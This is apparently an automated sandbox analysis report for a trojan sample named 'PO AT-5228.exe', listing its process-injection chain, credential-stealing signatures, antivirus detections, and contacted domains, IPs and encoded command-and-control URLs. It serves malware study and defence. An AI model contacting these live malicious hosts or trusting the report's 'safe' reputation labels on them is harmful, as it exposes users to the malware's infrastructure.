                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554972 Sample: PO AT-5228.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 28 www.kghjkx.xyz 2->28 30 www.iuyi542.xyz 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 PO AT-5228.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 BLUymyzgBTyhbo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 AtBroker.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 BLUymyzgBTyhbo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.flikka.site 67.223.117.142, 59058, 59069, 59085 VIMRO-AS15189US United States 22->34 36 www.kghjkx.xyz 47.129.103.185, 59110, 59111, 59112 ESAMARA-ASRU Canada 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO AT-5228.exe34%ReversingLabsWin32.Trojan.AutoitInject
                PO AT-5228.exe27%VirustotalBrowse
                PO AT-5228.exe100%AviraHEUR/AGEN.1319223
                PO AT-5228.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                binacamasala.com0%VirustotalBrowse
                ladylawher.shop0%VirustotalBrowse
                www.kghjkx.xyz2%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111325300285.jpg0%Avira URL Cloudsafe
                http://www.neg21.top/1i1f/0%Avira URL Cloudsafe
                http://www.energyparks.net/k47i/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111538232952.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js0%Avira URL Cloudsafe
                http://www.primeproperty.property/c1ti/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js0%Avira URL Cloudsafe
                http://www.ladylawher.shop/i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                http://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                http://www.yvrkp.top/9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                http://www.flikka.site/brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111832440129.jpg0%Avira URL Cloudsafe
                http://www.ladylawher.shop/i4bc/0%Avira URL Cloudsafe
                https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPo0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js0%Avira URL Cloudsafe
                http://www.iuyi542.xyz/cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ=0%Avira URL Cloudsafe
                http://www.kghjkx.xyz/usop/0%Avira URL Cloudsafe
                http://www.digitaladpro.shop0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111513122916.jpg0%Avira URL Cloudsafe
                http://www.energyparks.net/k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121022389060.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png0%Avira URL Cloudsafe
                http://www.binacamasala.com/usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpg0%Avira URL Cloudsafe
                http://www.primeproperty.property/c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281124251637.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png0%Avira URL Cloudsafe
                http://www.binacamasala.com/usv6/0%Avira URL Cloudsafe
                http://www.iuyi542.xyz/cymd/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111535192258.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg0%Avira URL Cloudsafe
                http://www.digitaladpro.shop/m6se/0%Avira URL Cloudsafe
                http://www.college-help.info/fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111752281448.jpg0%Avira URL Cloudsafe
                http://www.yvrkp.top/9jdk/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png0%Avira URL Cloudsafe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121103162503.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281610030481.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpg0%Avira URL Cloudsafe
                http://www.flikka.site/brrb/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                dns.webcake.io
                113.20.119.31
                truefalse
                  high
                  www.college-help.info
                  38.88.82.56
                  truefalse
                    high
                    ghs.google.com
                    172.217.16.211
                    truefalse
                      high
                      binacamasala.com
                      3.33.130.190
                      truetrueunknown
                      ladylawher.shop
                      3.33.130.190
                      truetrueunknown
                      www.kghjkx.xyz
                      47.129.103.185
                      truetrueunknown
                      www.yvrkp.top
                      104.21.14.183
                      truetrue
                        unknown
                        www.flikka.site
                        67.223.117.142
                        truetrue
                          unknown
                          www.marketplacer.top
                          194.58.112.174
                          truetrue
                            unknown
                            iuyi542.xyz
                            38.47.237.27
                            truetrue
                              unknown
                              neg21.top
                              206.119.81.36
                              truetrue
                                unknown
                                energyparks.net
                                3.33.130.190
                                truefalse
                                  high
                                  15.164.165.52.in-addr.arpa
                                  unknown
                                  unknownfalse
                                    high
                                    www.primeproperty.property
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.digitaladpro.shop
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.energyparks.net
                                        unknown
                                        unknownfalse
                                          high
                                          www.neg21.top
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.binacamasala.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.iuyi542.xyz
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.jllllbx.top
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.ladylawher.shop
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.primeproperty.property/c1ti/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.energyparks.net/k47i/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.neg21.top/1i1f/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ladylawher.shop/i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ladylawher.shop/i4bc/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.flikka.site/brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yvrkp.top/9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.iuyi542.xyz/cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kghjkx.xyz/usop/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.energyparks.net/k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.binacamasala.com/usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.primeproperty.property/c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.binacamasala.com/usv6/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.iuyi542.xyz/cymd/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.college-help.info/fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Qltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.digitaladpro.shop/m6se/false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yvrkp.top/9jdk/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.flikka.site/brrb/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabAtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111325300285.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://reg.ruAtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111538232952.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lanAtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.jsAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.jsAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111832440129.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPoAtBroker.exe, 00000003.00000002.3526286582.0000000005DB6000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.00000000044E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.jsAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.digitaladpro.shopBLUymyzgBTyhbo.exe, 00000005.00000002.3527019353.000000000576F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111513122916.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&amp;reg_source=parking_autoAtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpgBLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.jsAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_landAtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121022389060.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpgBLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281124251637.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://getbootstrap.com/)AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpegAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.ecosia.org/newtab/AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111535192258.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
